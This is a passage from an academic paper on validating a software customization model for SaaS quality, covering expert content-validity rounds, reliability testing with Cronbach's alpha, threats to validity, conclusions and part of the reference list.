1.00 Con 4 1 1.00 Con 4 1 1.00 Con 5 1 1.00 Con 5 0.83 0.82 Con 6 0.8 0.76 Con 6 0.83 0.82 Con 7 0.8 0.76 Con 7 1 1.00 Con 8 0.8 0.76 Con 8 1 1.00 Configuration Con 9 0.6 0.42 0.8 0.958 Com 1 1 1.00 Com 1 1 1.00 Com 2 1 1.00 Com 2 0.83 0.82 Com 3 0.8 0.76 Com 3 1 1.00 Com 4 0.4 0.13 Com 4 0.5 0.27 Composition Com 5 1 1.00 0.84 Com 5 1 1.00 0.86b Ext 1 1 1.00 Ext 1 1 1.00 Ext 2 1 1.00 Ext 2 0.83 0.82 Ext 3 0.6 0.42 Ext 3 0.83 0.82 Ext 4 1 1.00 Ext 4 1 1.00 Ext 5 0.8 0.76 Ext 5 1 1.00 Extension Ext 6 1 1.00 0.9 Ext 6 0.83 0.82 0.91 Int 1 1 1.00 Int 1 1 1.00 Int 2 1 1.00 Int 2 0.83 0.82 Int 3 1 1.00 Int 3 0.83 0.82 Int 4 0.6 0.42 Int 4 1 1.00 Int 5 0.8 0.76 Int 5 1 1.00 Int 6 0.4 0.13 Int 6 1 1.00 Int 7 0.6 0.42 Int 7 0.83 0.82 Int 8 0.6 0.42 Int 8 1 1.00 Integration Int 9 0.8 0.76 0.75 Int 9 0.83 0.82 0.92 (continued on next page) Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 16/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 Table 12 (continued) Construct Round_1 Round_2 Item_1 I-CVI_1 Kappa S-CVI_1 Item_2 I-CVI_2 Kappa S-CVI_2 Mod 1 0.8 0.76 Mod 1 0.83 0.82 Mod 2 0.6 0.42 Mod 2 1 1.00 Mod 3 0.8 0.76 Mod 3 0.83 0.82 Mod 4 0.8 0.76 Mod 4 0.83 0.82 Mod 5 0.8 0.76 Mod 5 0.67 0.56 Mod 6 0.8 0.76 Mod 6 0.67 0.56 Mod 7 0.6 0.42 Mod 7 0.83 0.82 Mod 8 1 1.00 Modification Mod 9 0.8 0.76 0.77 0.809c QA 1 1 1.00 QA 1 1 1.00 QA 2 1 1.00 QA 2 1 1.00 QA 3 1 1.00 QA 3 1 1.00 QA 4 0.8 0.76 QA 4 1 1.00 QA 5 0.6 0.42 QA 5 1 1.00 QA 6 0.6 0.42 QA 6 1 1.00 QA 7 0.6 0.42 QA 7 1 1.00 QA 8 0.8 0.76 QA 8 1 1.00 QA 9 0.8 0.76 QA 9 1 1.00 QA 10 0.8 0.76 QA 10 1 1.00 QA 11 0.6 0.42 QA 11 0.83 0.82 QA 12 0.8 0.76 QA 12 1 1.00 SaaS Quality QA 13 0.6 0.42 0.76 QA 13 1 1.00 0.98 Notes. aItems and costructs with red color were removed from the Model. bS-CVI of Composition construct after remvoing invalid items is 0.95. cS-CVI of Modification construct after remvoing invalid items is 0.86. Figure 4 Results of I-CVI within Content Validity rounds. Full-size DOI: 10.7717/peerjcs.294/fig-4 Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 17/34 https://peerj.com https://doi.org/10.7717/peerjcs.294/fig-4 http://dx.doi.org/10.7717/peerj-cs.294 Figure 5 Results of S-CVI within content validity rounds. Full-size DOI: 10.7717/peerjcs.294/fig-5 56 items obtained I-CVIs of 1.00, 0.83, 0.67, and 0.5 respectively. In this round, all items that did not meet the minimum I-CVI of 0.78 were removed. However, more experts were involved in round 2 than in round 1 (considering the fact that the larger the set of experts, the harder it is to reach consensus), a significant improvement of the I-CVIs results was produced in round 2. Figure 4 compares the I-CVIs of both rounds. The scores in round 1 varied from 0.4, 0.6, 0.8, and 1.00 to 0.5, 0.67, 0.83, and 1.00 in round 2. Furthermore, a significant increase in the percentage of items obtaining an I-CVI of 1.00 in round 2 was observed. Furthermore, the kappa coefficient values in Table 12 show that 4 items, 12 items, and 43 items in round 1 received poor, fair, and excellent agreement respectively. Conversely, 2 items, 6 items, and 48 items in round 2 received poor, good, and excellent agreement respectively. Noticeably, all items with poor agreement also have poor I-CVI values. Based on the S-CVI results in Table 12, most of the constructs attained an acceptable S-CVI in both rounds, except for the Personalization S-CVI in round 2 that was 0.72. Figure 5 shows that all S-CVI values were improved in round 2, except for the S-CVI value for Personalization that dropped from 0.8 to 0.72. The decision to delete the Personalization construct and all of its associated items was taken for the following reasons: 1. Comments from experts of both rounds indicated different interpretations; some of them thought of this construct as an alternative name for ‘‘customization, whereas others did not associate it with customization. 2. The S-CVI of 0.72 in round 2 did not meet the S-CVI criteria (> = 0.8). 3. Five of 8 items associated with this construct did not meet the I-CVI criteria (>= 0.78) in round 2. Moreover, the S-CVIs of the Composition (0.86) and Modification (0.80) constructs in round 2 improved to 0.95 and 0.86, respectively, after removing their associated items that breached the I-CVI criteria. Detailed calculations of the I-CVIs, S-CVIs, and Kappa Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 18/34 https://peerj.com https://doi.org/10.7717/peerjcs.294/fig-5 http://dx.doi.org/10.7717/peerj-cs.294 Table 13 The development of model in each version. Construct Original Items deleted Total items deleted Final version Round 1 Round 2 Personalization 8 0 8 8 0 Configuration 9 1 0 1 8 Composition 5 0 1 1 4 Extension 6 0 0 0 6 Integration 9 0 0 0 9 Modification 9 2 2 4 5 SaaS quality 13 0 0 0 13 Total 59 3 11 14 45 for rounds 1 and 2 are presented in Tables in the supplementary documents: Appendices D and E. Because of the satisfactory level of consensus indicated by the I-CVI and S-CVI scores after round 2, no further rounds were necessary. In its final version, the software customization model for SaaS quality consisted of 45 items, grouped into six constructs: 8 items for Configuration, 4 items for Composition, 6 items for Extension, 9 items for Integration, 5 items for Modification, and 13 items for SaaS quality, as illustrated in Table 13. Internal consistency reliability test Based on the results of the two content validity evaluation rounds, version 3 of the model was further tested regarding its internal consistency reliability using a five-point Likert scale ranging from 1 (strongly disagree) to 5 (strongly agree). In this study, selected profiles, including gender, ages, and familiarity with SaaS applications, were reported. A sample of 34 software engineering researchers completed the survey. Most of the respondents were male (n=32, 94.12%). The age of the majority of respondents (55.88%) was between 31 and 40 years (n=19), followed by 23.53% and 20.59% for 21–30 (n=8) and over 40 (n=7), respectively. The majority of respondents had an excellent knowledge of SaaS applications (n=32, 94.12%) and only 5.88% (n=2) were somewhat familiar with it. The Cronbachs alpha for each construct, corrected item-total correlation, and Cronbachs alpha coefficients if the item was deleted are summarized in Table 14. Reliability analysis showed reasonable internal consistency. The computed values of Cronbachs alpha for the Configuration (n=8), Composition (n=4), Extension (n=6), Integration (n=9), and Modification (n=5) constructs, as well as SaaS quality (n=13) were 0.734, 0.709, 0.764, 0.814, 0.848, and 0.871, respectively. The corrected item-total correlation coefficients for Configuration items ranged from 0.301 (Con 6) to 0.522 (Con 5); Composition items ranged from 0.476 (Com 2) to 0.544 (Com 3); Extension items ranged from 0.382 (Ext 2) to 0.661 (Ext 1); Integration items ranged from 0.249 (Int 3) to 0.71 (Int 2); Modification items ranged from 0.532 (Mod 1) to 0.812 (Mod 3); and SaaS quality items ranged from 0.437 (QA 7) to 0.64 (QA 1). Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 19/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294#supp-2 http://dx.doi.org/10.7717/peerj-cs.294#supp-2 http://dx.doi.org/10.7717/peerj-cs.294#supp-1 http://dx.doi.org/10.7717/peerj-cs.294 Table 14 Reliability test results of validated model. Construct Item Cronbach’s Alpha if item deleted Corrected item-total correlation Construct Item Cronbach’s Alpha if item deleted Corrected item-total correlation Con 1 0.702 0.455 Int 1 0.813 0.339 Con 2 0.702 0.451 Int 2 0.766 0.71 Con 3 0.716 0.381 Int 3 0.826 0.249b Con 4 0.706 0.439 Int 4 0.799 0.484 Con 5 0.691 0.522 Int 5 0.772 0.708 Con 6 0.731 0.301 Int 6 0.81 0.426 Con 7 0.697 0.476 Int 7 0.783 0.608 Configuration (0.734)a Con 8 0.711 0.414 Int 8 0.791 0.557 Com 1 0.657 0.501 Integration (0.814) Int 9 0.788 0.572 Com 2 0.659 0.476 QA 1 0.858 0.64 Com 3 0.632 0.544 QA 2 0.856 0.627 Composition (0.709) Com 4 0.641 0.513 QA 3 0.861 0.545 Ext 1 0.684 0.661 QA 4 0.861 0.57 Ext 2 0.758 0.382 QA 5 0.86 0.581 Ext 3 0.723 0.532 QA 6 0.866 0.47 Ext 4 0.724 0.527 QA 7 0.869 0.437 Ext 5 0.715 0.557 QA 8 0.864 0.505 Extension (0.764) Ext 6 0.754 0.401 QA 9 0.86 0.57 Mod 1 0.843 0.532 QA 10 0.857 0.629 Mod 2 0.823 0.633 QA 11 0.866 0.507 Mod 3 0.771 0.812 QA 12 0.858 0.619 Mod 4 0.804 0.715 SaaS Quality (0.871) QA 13 0.864 0.493 Modification (0.848) Mod 5 0.826 0.621 Notes. aValue between brackets is Cronbach’s Alpha results for the construct. bItem with red colour is deleted based on Cronbach’s Alpha results if item deleted. Table 14 also indicates that none of the items significantly reduced the value of the alpha coefficient if they were removed from the construct, except for Int 3 (in this case, the value increased from 0.814 to 0.826). Moreover, Int 3 had the lowest item-total correlation value (0.249), indicating that it did not measure the same construct as the other items. The resulting values indicate that the model has high reliability. DISCUSSION From the initial development of the software customization model for SaaS quality published in (Ali et al., 2019), we realized that the concept should be refined. The concept was initially defined based on 46 customization practices and 13 quality attributes in the SaaS multi-tenant context. Each customization practice was assigned to one of the customization approaches (8, 9, 5, 6, 9, and 9 items for Personalization, Configuration, Composition, Extension, Integration, and Modification, respectively). Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 20/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 To refine the model, a rigorous methodology, composed of an iterative content validity evaluation process and a reliability test, was followed. During the two content validity rounds, answers and comments were suggested by experts to further refine the language used and explicitly declare the multi-tenancy concept in the items. Consequently, the I-CVIs and S-CVIs results varied between rounds 1 and 2. In round 1, the items that breached the I-CVI criteria were re-written. Moreover, a reduction in the number of items (from 59 to 56) was achieved. Similarly, version 3, consisting of 45 items, was created after round 2. A total of 11 items were deleted in this round; 2, 1, and 8 items were deleted from the Modification, Composition, and Personalization constructs, respectively. Although 3 of 8 items of the Personalization construct did not breach the I-CVI criteria, they were deleted due to the removal of the Personalization construct that did not meet the S-CVI criteria. Several experts had conflicting opinions regarding the Personalization construct. One opinion was that Personalization is a synonym word for customization, hence, all approaches proposed in this study should be considered Personalization approaches. The second point of view was that it is completely different from customization as it does not involve any customer action, which is essential for customization. The authors of this study agreed with the second opinion. The initial inclusion of Personalization as an approach to Customization in this study was due to the ultimate purpose of both mechanisms to meet the unique requirements of the customer by adapting the application to their needs. The results of rounds 1 and 2 indicated considerable discrepancy in the numbers of items deleted and revised. The number of items deleted in round 1 (3) was lower than that in round 2 (11). By contrast, the number of items revised in round 1 (21 items) was higher than that in round 2 (0). This result, however, is expected as the objective of the first round was to revise the items that did not meet the I-CVI criteria rather than delete them. The purpose of round 2, however, was to remove any item that did not meet the criteria. This strategy, therefore, allowed most of the items to be assessed twice. Moreover, with this strategy, stability in the response of experts was also achieved with the recommended minimum number of rounds (two rounds) (Landeta, 2006), overcoming the limitations of iteration structure methods (e.g., the Delphi method), which does not specify any number of rounds (Keeney, Hasson & McKenna, 2001). The consensus for content validity was reached and an additional round was included to test the internal consistency reliability of the model items and constructs. In this round, software engineer researchers were asked to reassess the items and evaluate them using a 5- point Likert-type scale. The reliability, found by using Cronbachs alpha, is proof of items consistently representing the constructs. In this test, only one item was deleted to increase the value of Cronbachs alpha. At the end of this round, all constructs and items achieved the required values of reliability and validity. The final version of the proposed model is shown in Fig. 6. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 21/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 Figure 6 Final proposed software customization model for SaaS quality. Full-size DOI: 10.7717/peerjcs.294/fig-6 THREATS TO VALIDITY Three major limitations emerge. These include sample size, selection bias, and modification bias. Sample size The experts involved in the content validation rounds numbered 5 in the first round and 6 in the second round. Although this sample is fairly small for the iterative method, smaller numbers are considered sufficient for homogeneous samples (Hong et al., 2019). Moreover, when using the content validity index (CVI) method, 5 experts are considered sufficient to validate the model (Zamanzadeh et al., 2015). Because our samples were relatively homogeneous (academicians) in terms of participants, expertise, 3 to 10 experts are sufficient for the adopted CVI analysis method, and more than 10 experts would be unnecessary (Polit & Beck, 2006). Accordingly, the number of experts used in this study should be considered acceptable. Another issue with our sample size is the imbalance in the numbers of experts in rounds 1 and 2. The increased number of experts from 5 to 6 in round 2 was because the group of experts invited to participate in the second round was larger. Although the required threshold value for consensus decreases as the number of experts increases, it is harder to achieve consensus with larger numbers. As such, the increase from 5 to 6 in round 2 did not skew the results of this study. Additionally, it is not required to have a consistent number of participants in all rounds of a study; for instance, Cadorin et al. (2017) had 10 participants in the first round and 8 in the subsequent rounds of their study. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 22/34 https://peerj.com https://doi.org/10.7717/peerjcs.294/fig-6 http://dx.doi.org/10.7717/peerj-cs.294 Selection bias The selection of experts is essential for obtaining valid and reliable results. Compared to random selection methods, our purposive sampling of experts may have led to selection bias. In our study, four possible issues related to selection bias were identified: 1. Self-selection bias: This concern was mitigated by identifying and approaching the most suitable experts for our study via an extensive systematic mapping study (Ali et al., 2019). 2. Homogeneous sample: The diversity of experts strengthens the statistical power and the generalizability of results; however, a homogeneous sample in the studies that used the iterative method is acceptable to facilitate group decision-making process (Skulmoski, Hartman & Krahn, 2007; Logue & Effken, 2013). 3. Bias of superior individuals: Experts were approached based on their published papers (81 papers) that were most related to this study, and every paper had more than one author. Therefore, there is a possibility that the experts who participated in this study are from the same organization or university, and in such a case, there is a real possibility that the ideas and opinions of one expert will be influenced by more dominant experts in the same organization (Mubarak et al., 2019; Fletcher & Marchildon, 2014). Accordingly, the experts opinions were collected anonymously via e-mail without being affected or pressured by other individuals (Mubarak et al., 2019; Halim et al., 2017; Stevens et al., 2006). 4. Different experts in each round: Another possible limitation is having different expert panels in each round, which is not common in iterative methods (Stevens et al., 2006; Parratt et al., 2016). Although having the same experts in the initial round who continued to participate in all rounds of a study provides the opportunity for the experts to alter their opinions in successive rounds based on the results of previous rounds to achieve consensus (Stevens et al., 2006), the results may be influenced by forced consensus through conformity and diverse opinions being relinquished (Parratt et al., 2016). Considering this fact, having different experts participate in each round may arguably improve the results of a study (Parratt et al., 2016). It is worth noting that the survey for round 2 was sent to the same experts who were involved in the initial round and none responded within the time limit, leading to new respondents being selected for the second round. In addition, as participation in our study was voluntary, those who participated in round 1 may not have had the time or inclination to continue. Modification bias The model manipulation applied in this study resulted in the number of constructs being reduced from 7 to 6 by the removal of the Personalization construct and associated items that did not attain an acceptable CVIs value. Although this modification to the model may have added a certain level of bias, the deletion of the Personalization construct is indirectly supported by the findings of SMS, where Personalization received the lowest consideration of all customization solutions proposed for SaaS applications. Furthermore, we followed the strategy of revising the items that did not meet the I-CVI criteria rather than deleting Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 23/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 them in round 1, leaving the deletion of the invalid item(s)/construct to the subsequent rounds. This strategy provided the opportunity for most of the items to be assessed at least twice. Eventually, the deletion of the Personalization construct and other items was deemed necessary for the study on grounds supported in the literature and by experts’ comments. CONCLUSIONS The comprehension of the generic customization approaches and practices in the SaaS multi-tenant context and the identification of the key quality attributes of SaaS applications associated with customization is an opportunity to increase the understanding of SaaS customization, creating further discussions of the subject. The purpose of this study was, therefore, to develop a software customization model for SaaS quality to identify possible customization approaches, practices, and quality attributes in the SaaS Multi-Tenant context. In addition, this study can be considered the first one, to the best of the authors’ knowledge, to develop a theoretical, validated, and reliable software customization model for SaaS quality. To evaluate this model, an iterative method was used to conceptualize it, assess its content validity, and evaluate its reliability. A preliminary version of this model, composed of seven constructs (six customization approaches and SaaS quality) and 59 items (46 SaaS customization practices and 13 SaaS quality attributes), was used. After the completion of two rounds of content validity evaluation, one construct and 14 items were removed. To improve the reliability of the validated model, round 3 was executed and all constructs achieved the required Cronbachs alpha value. Furthermore, the removal of only one item significantly reduced the Cronbachs alpha value. The final version of the model consisted of six constructs and 44 items. These six constructs and their associated items are as follows: 1) Configuration (eight items), 2) Composition (four items), 3) Extension (six items), 4) Integration (8 items), 5) Modification (five items), and 6) SaaS quality (13 items). However, the model that was iteratively validated offers some certainty of construct validity, our ongoing research is to evaluate its construct validity and reliability with a larger sample of SaaS implementation team members, based on the industry environment. In addition, this study is restricted to the quality attributes of SaaS applications from a systematic mapping study (Ali et al., 2019). However, this study does not claim that only these SaaS quality attributes are associated with customization. Future studies could also be conducted to expand the model to include many other quality attributes of SaaS applications, especially SaaS attributes related to the affordability quality attribute (e.g., resource cost and maintenance costs). The key contribution of this study is that it advances existing knowledge on SaaS customization and quality by the development and validation of a software customization model. It also enhances the potential to analyze empirically the impact of software customization on SaaS quality from a software professionals perspectives. This study can be used as a source of qualitative and quantitative data for further investigation into the statistical linkage between software customization and SaaS quality. The findings of these future investigations will prompt evaluators, testers, and developers of SaaS applications to resolve quality-related issues before any customization is introduced. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 24/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294 ACKNOWLEDGEMENTS The authors gratefully acknowledge the reviewersfor their valuable feedback and comments. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work is supported by Universiti Putra Malaysia. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Universiti Putra Malaysia. Competing Interests The authors declare there are no competing interests. Author Contributions • Abdulrazzaq Qasem Ali conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Abu Bakar Md Sultan conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Abdul Azim Abd Ghani and Hazura Zulzalil conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The raw measurements are available in the Supplementary Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.294#supplemental-information. REFERENCES Akojwar MRA, Kothari MRV, Kahate MSA, Ganvir MRD. 2012. Software as a service with cloud computing. IJECCE 3(1):149–155. Al-Shardan MM, Ziani D. 2015. Configuration as a service in multi-tenant enterprise resource planning system. Lecture Notes on Software Engineering 3(2):95–100. Alhamad M, Dillon T, Chang E. 2010. Conceptual SLA framework for cloud computing. In: 4th IEEE international conference on digital ecosystems and technologies. Piscat- away: IEEE, 606–610 DOI 10.1109/DEST.2010.5610586. Ali AQ, Sultan ABM, Ghani AAA, Zulzalil H. 2017. Critical issues across SaaS develop- ment: learning from experience. International Journal of Advances in Electronics and Computer Science 4(9):69–74. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 25/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.294#supplemental-information http://dx.doi.org/10.7717/peerj-cs.294#supplemental-information http://dx.doi.org/10.7717/peerj-cs.294#supplemental-information http://dx.doi.org/10.1109/DEST.2010.5610586 http://dx.doi.org/10.7717/peerj-cs.294 Ali AQ, Sultan ABM, Ghani AAA, Zulzalil H. 2018a. Customization of software as a service application: problems and objectives. Journal of Computer Science & Computational Mathematics 8(3):27–32 DOI 10.20967/jcscm.2018.03.001. Ali AQ, Sultan ABM, Ghani AAA, Zulzalil H. 2018b. The five ws taxonomy on cus- tomization of software as a service applications. Journal of Computer Science & Computational Mathematics 8(3):43–48 DOI 10.20967/jcscm.2018.03.003. Ali AQ, Sultan ABM, Ghani AAA, Zulzalil H. 2019a. Empirical studies on the impact of software customization on quality attributes: a systematic review. Journal of Theoretical and Applied Information Technology 97(6):1747–1763. Ali AQ, Sultan ABM, Ghani AAA, Zulzalil H. 2019b. A systematic mapping study on the customization solutions of software as a service applications. IEEE Access 7:88196–88217 DOI 10.1109/ACCESS.2019.2925499. Alkawsi GA, Ali NB, Alghushami A. 2018. Toward understanding individuals acceptance of internet of things-based services: developing an instrument to measure the acceptance of smart meters. Journal of Theoretical & Applied Information Technology 96(13):4265–4281. Almorsy M, Grundy J, Ibrahim AS. 2012. TOSSMA: a tenant-oriented SaaS security management architecture. In: 2012 IEEE fifth international conference on cloud computing, 981–988 DOI 10.1109/CLOUD.2012.146. Aulbach S, Seibold M, Jacobs D, Kemper A. 2011. Extensibility and data sharing in evolving multi-tenant databases. In: 2011 IEEE 27th international conference on data engineering, 99–110 DOI 10.1109/ICDE.2011.5767872. Aulkemeier F, Paramartha MA, Iacob M-E, Van Hillegersberg J. 2016. A pluggable service platform architecture for e-commerce. Information Systems and e-Business Management 14(3):469–489 DOI 10.1007/s10257-015-0291-6. Badidi E. 2013. A framework for software-as-a-service selection and provisioning. ArXiv preprint. arXiv:1306.1888. Bell E, Bryman A, Harley B. 2015. Business research methods. 4th edition. Oxford University Press. Bhatti MW, Ahsan A. 2017. Global monitoring and control: a process improvement framework for globally distributed software development teams. Journal of Global Information Technology Management 20(1):43–63. Brehm L, Heinzl A, Markus ML. 2001. Tailoring ERP systems: a spectrum of choices and their implications. In: Proceedings of the 34th annual Hawaii international conference on system sciences. 9 DOI 10.1109/HICSS.2001.927130. Cadorin L, Bagnasco A, Tolotti A, Pagnucci N, Sasso L. 2017. Developing an instrument to measure emotional behaviour abilities of meaningful learning through the Delphi technique. Journal of Advanced Nursing 73(9):2208–2218 DOI 10.1111/jan.13273. Cancian MH, Hauck JCR, Von Wangenheim CG, Rabelo RJ. 2010. Discovering software process and product quality criteria in software as a service. In: Product-focused software process improvement. Berlin, Heidelberg: Springer Berlin Heidelberg, 234–247. Chaumun M, Kabaili H, Keller RK, Lustman F. 2002. A change impact model for changeability assessment in object-oriented software systems. Science of Computer Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 26/34 https://peerj.com http://dx.doi.org/10.20967/jcscm.2018.03.001 http://dx.doi.org/10.20967/jcscm.2018.03.003 http://dx.doi.org/10.1109/ACCESS.2019.2925499 http://dx.doi.org/10.1109/CLOUD.2012.146 http://dx.doi.org/10.1109/ICDE.2011.5767872 http://dx.doi.org/10.1007/s10257-015-0291-6 http://arXiv.org/abs/1306.1888 http://dx.doi.org/10.1109/HICSS.2001.927130 http://dx.doi.org/10.1111/jan.13273 http://dx.doi.org/10.7717/peerj-cs.294 Programming 45(2):155–174. Special Issue on Software Maintenance and Reengi- neering (CSMR 99) DOI 10.1016/S0167-6423(02)00058-8. Chen D, Li Q, Kong L. 2013. Process customization framework in SaaS applica- tions. In: 2013 10th web information system and application conference, 471–474 DOI 10.1109/WISA.2013.94. Coallier F. 2001. Software engineering–product quality–part 1: quality model. Geneva: International Organization for Standardization. Cohen L, Manion L, Morrison K. 2002. Research methods in education. Routledge. Correia A, Penha JR, Da Cruz AMR. 2013. An architectural model for customizing the business logic of SaaS applications. In: ICSOFT. Setúbal, Portugal: SciTePress. CSMIC. 2014. Service measurement index framework Version 2.1. Carnegie Mellon University. Available at https://pdf4pro.com/view/service-measurement-index- framework-version-2-155f7a.html. Davenport TH. 1998. Putting the enterprise into the enterprise system. Harvard Business Review 76(4):121–131. Davis LL. 1992. Instrument review: getting the most from a panel of experts. Applied Nursing Research 5(4):194–197 DOI 10.1016/S0897-1897(05)80008-4. De Miranda PG. 2010. Saas (software as a service)-infrastructures and applications in real scenarios. PhD thesis, Instituto Superior Técnico, Universidade Tecnológica de. Dong J, Zhang S, Shi Y, Xu X, Guo W. 2010. Process customization based on dependent topology in Software as a Service model. In: The 2nd international conference on software engineering and data mining. Piscataway: IEEE, 295–298. Duarte Filho NF, De Souza Bermejo PH, Zambalde AL, De Barros US. 2013. Saasquality-a method for quality evaluation of software as a service (saas). Interna- tional Journal of Computer Science & Information Technology 5(3):101–117. Espadas J, Concha D, Molina A. 2008. Application development over software-as-a- service platforms. In: 2008 the third international conference on software engineering advances. IEEE, 97–104. Espadas J, Molina A, Jiménez G, Molina M, Ramírez R, Concha D. 2013. A tenant-based resource allocation model for scaling Software-as-a-Service applications over cloud computing infrastructures. Future Generation Computer Systems 29(1):273–286. Fan H, Hussain FK, Younas M, Hussain OK. 2015. An integrated personalization framework for SaaS-based cloud services. Future Generation Computer Systems 53:157–173 DOI 10.1016/j.future.2015.05.011. Fletcher AJ, Marchildon GP. 2014. Using the Delphi method for qualitative, participa- tory action research in health leadership. International Journal of Qualitative Methods 13(1):1–18. Gey F, Landuyt DV, Joosen W. 2015. Middleware for customizable multi-staged dynamic upgrades of multi-tenant SaaS applications. In: 2015 IEEE/ACM 8th international conference on utility and cloud computing (UCC). 102–111 DOI 10.1109/UCC.2015.26. Gey F, Van D, Walraven S, Joosen W. 2014. Feature models at run time feature mid- dleware for multi-tenant saas applications. In: Proceedings of the 9th international workshop on models at run.time. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 27/34 https://peerj.com http://dx.doi.org/10.1016/S0167-6423(02)00058-8 http://dx.doi.org/10.1109/WISA.2013.94 https://pdf4pro.com/view/service-measurement-index-framework-version-2-155f7a.html https://pdf4pro.com/view/service-measurement-index-framework-version-2-155f7a.html http://dx.doi.org/10.1016/S0897-1897(05)80008-4 http://dx.doi.org/10.1016/j.future.2015.05.011 http://dx.doi.org/10.1109/UCC.2015.26 http://dx.doi.org/10.7717/peerj-cs.294 Gilmore JH, Pine BJ. 1997. The four faces of mass customization. Harvard Business Review 75(1):91–102. Guo C-J, Sun W, Jiang Z-B, Huang Y, Gao B, Wang Z-H. 2011. Study of software as a service support platform for small and medium businesses. In: Agrawal D, Candan KS, Li W-S, eds. New frontiers in information and software as services. Berlin, Heidelberg: Springer Berlin Heidelberg, 1–30. Haines MN. 2009. Understanding enterprise system customization: an exploration of implementation realities and the key influence factors. Information Systems Management 26(2):182–198 DOI 10.1080/10580530902797581. Hair Jr JF, Anderson RE, Tatham RL, Black WC. 2015. Multivariate data analysis. New Jersey: Pearson education. Halim N, Sulaiman S, Talib K, Ng E. 2017. Identifying the relevant features of the National Digital Cadastral Database (NDCDB) for spatial analysis by using the Delphi Technique. In: Proc. international conference on research methodology for built environment and engineering. Harris CL, Holloway S. 2012. Development of an evidence-based protocol for care of pilonidal sinus wounds healing by secondary intent using a modified reactive Delphi procedure. Part one: the literature review. International Wound Journal 9(2):156–172 DOI 10.1111/j.1742-481X.2011.00874.x. He Q, Han J, Yang Y, Grundy J, Jin H. 2012. QoS-driven service selection for multi- tenant SaaS. In: 2012 IEEE fifth international conference on cloud computing. Piscat- away: IEEE, 566–573 DOI 10.1109/CLOUD.2012.125. Helmich M, Müller J, Krüger J, Zeier A, Enderlein S, Plattner H. 2009. MapperMania: a framework for native multi-tenancy business object mapping to a persistent data source. In: AMCIS. Atlanta: AIS Electronic Library (AISeL). Hong QN, Pluye P, Fábregues S, Bartlett G, Boardman F, Cargo M, Dagenais P, Gagnon M-P, Griffiths F, Nicolau B, O’Cathain A, Rousseau M-C, Vedel I. 2019. Improving the content validity of the mixed methods appraisal tool: amodified e- Delphi study. Journal of Clinical Epidemiology 111:49–59 DOI 10.1016/j.jclinepi.2019.03.008. IT Governance Institute. 2007. COBIT 4.1: Control objectives, Management guidelines, Maturity models. Rolling Meadows: ITGI. Joha A, Janssen M. 2012. Design choices underlying the software as a service (saas) business model from the user perspective: exploring the fourth wave of outsourcing. Journal of Universal Computer Science 18(11):1501–1522. Kabbedijk J, Jansen S. 2011. Variability in multi-tenant environments: architectural design patterns from industry. In: Proceedings of the 30th international conference on advances in conceptual modeling: recent developments and new directions, ER’11. Berlin, Heidelberg: Springer-Verlag, 151–160. Keeney S, Hasson F, McKenna HP. 2001. A critical review of the Delphi technique as a research methodology for nursing. International Journal of Nursing Studies 38(2):195–200 DOI 10.1016/S0020-7489(00)00044-4. Khanjani A. 2015. Quality of service model for software as a service in cloud computing from users’ and providers’ perspectives. PhD thesis, Universiti Putra Malaysia. Ali et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.294 28/34 https://peerj.com http://dx.doi.org/10.1080/10580530902797581 http://dx.doi.org/10.1111/j.1742-481X.2011.00874.x http://dx.doi.org/10.1109/CLOUD.2012.125 http://dx.doi.org/10.1016/j.jclinepi.2019.03.008 http://dx.doi.org/10.1016/S0020-7489(00)00044-4 http://dx.doi.org/10.7717/peerj-cs.294 Khanjani A, Rahman WNWA, Ghani AAA, Sultan ABM. 2014. SaaS quality of service at- tributes. Journal of Applied Sciences 14(24):3613–3619 DOI 10.3923/jas.2014.3613.3619. Kong L, Li Q, Zheng X. 2010. A novel model supporting customization sharing in SaaS applications. In: 2010 international conference on multimedia information networking and security. 225–229 DOI 10.1109/MINES.2010.57. Kumara I, Han J, Colman A, Kapuruge M. 2015. Software-defined service networking: runtime sharing with performance differentiation in multi-tenant saas applications. In: 2015 IEEE international conference on services computing. Piscataway: IEEE, 210–217 DOI 10.1109/SCC.2015.37. Kumara I, Han J, Colman A, Nguyen T, Kapuruge M. 2013. Sharing with a difference: realizing service-based SaaS applications with runtime sharing and variation in dynamic software product lines. In: 2013 IEEE international conference on services computing. Piscataway: IEEE, 567–574 DOI 10.1109/SCC.2013.30. La HJ, Kim SD. 2009. A systematic process for developing high quality SaaS cloud services. In: Jaatun MG, Zhao G, Rong C, eds. Cloud computing. Berlin, Heidelberg: Springer Berlin Heidelberg, 278–289. Landeta J. 2006. Current validity of the Delphi method in social sciences. Technological Forecasting and Social Change 73(5):467–482 DOI 10.1016/j.techfore.2005.09.002. Lee JY, Lee JW, Cheun DW, Kim SD. 